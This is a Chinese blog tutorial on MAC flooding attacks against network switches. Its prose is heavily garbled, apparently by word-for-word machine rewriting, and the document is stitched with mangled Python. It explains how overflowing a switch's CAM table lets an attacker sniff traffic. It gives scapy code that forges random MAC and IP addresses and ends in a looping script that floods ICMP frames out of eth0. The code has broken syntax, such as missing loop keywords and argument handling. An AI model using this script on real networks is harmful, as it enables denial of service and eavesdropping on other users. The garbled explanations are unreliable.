Menu
0 Comments

Python黑帽编程 3.3 MAC洪水攻击 – 玄魂工作室

惯例配电盘(我只受考验我水流应用的轮流机具)。,依照知识最适当的这么大的表述)在资料转发迅速移动中依托对CAM表的查询来决定固有的的转发界面,对应的的MAC的对应进入不克不及在曲中找到。,这么地资料帧将被处置为播送帧。。凸轮台的满足的是有受限制的的。,最适当的多数以协议约束可以储藏处。,当凸轮表的MAC地址到达上限时,新的进入不能胜任的添加到CAM表中。

因越过准则,朕会发现物独一不普通的风趣的景象。。PC不息地向未知去处发送资料帧。,而且每个包的源MAC地址是不相同的。,当这些字组分类以十足快的一阵发送时,在中间休息时间内敏捷地纬纱软鞭子的凸轮表。。这些伪造的MAC地址占有率了CAM表。,真马 C地址进入无法进入CAM表。。经过配电盘的一点精神健全的单播资料帧都是PROC。。在这种情况下,配电盘被降低地位为集中器。。

当配电盘被降低地位为集中器后,,朕可以监控连接到配电盘的作为主人的有资料。。

自然,详细轮流策略对ARP洪水的对称是相异点的,现场受考验是贫穷的。。如今让朕进入计划节。。

编码技击术

有诸多办法来建造随机MAC和IP地址。,因地址的基准体式是在的。,打包起来停止划桨。。在这里要给完全地绍介的是scapy模块切中要害RandMAC和RandIP办法。这两种办法用于随机产生MAC地址和IP地址。,接纳模板参量的办法,产生思索到段的地址。。

譬如,上面的法典:

#!/usr/bin/python

from scapy.all import *

i=5

(i)

    print RandMAC()

    print RandIP()

    i=i-1

总算如次所示。:

图2

倘若必要产生紧握段IP,您可以输出委派的模板。。

#!/usr/bin/python

from scapy.all import *

i=5

(i)

    print RandIP(“.*”)

    i=i-1

运转总算如次:

图3

在求解随机成绩后来的,如今让朕思索什么的资料包可以到达这么地目标。让朕,倘若朕的包中有委派的源IP和MAC。,当时的软鞭子将被记载下落。。

譬如ARP包:

Ether(SRC)RandMAC(),dst=FF:FF:FF:FF:FF:FFARP(OP)2,
psrc=
“”, hwdst=FF:FF:FF:FF:FF:FF)/Padding(工作量)“X”*18))

譬如,ICMP包装盒。:

Ether(SRC)RandMAC(“*:*:*:*:*:*”),

dst=RandMAC(“*:*:*:*:*:*”)) / \

IP(SRC)RandIP(“*.*.*.*”),

dst=RandIP(“*.*.*.*”)) / \

ICMP()

处理了这两个紧排成绩。,你可以写出满的的法典。:

图4

#!/usr/bin/python

import sys

from scapy.all import *

import time

iface=”eth0″

if Le())> 2

    iface=[1]

(1)

    packet= Ether(SRC)RandMAC(“*:*:*:*:*:*”),

                  dst=RandMAC(“*:*:*:*:*:*”)) / \

    IP(SRC)RandIP(“*.*.*.*”),

    dst=RandIP(“*.*.*.*”)) / \

    ICMP()

    ()

    sendp(packet,iface=iface,loop=0)

是你这么说的嘛!法典延续发送ICMP资料包。,来赚得MAC洪水攻击。运转总算如次:

图5

2总结

本条缺乏计划中的计划的新知识。,缺少对使更叠发生电网络和以太网有必然的理解。。

下一节,让朕来谈谈VLAN攻击。。

VLAN攻击比率已在WeChat订阅号中放开。,热烈的先生输出订阅号码(较低的二维码),从菜单栏> Python黑帽计划,您可以进入。。

检查满的的迅速移动一系列,请理睬我的微信订阅号(宣匈521),往下的二维码,恢复女用长围巾。QQ群成绩议论:Hacking (1群):303242737   Hacking (2群):147098303。

 

奥秘的灵魂逛商店

发表评论

电子邮件地址不会被公开。 必填项已用*标注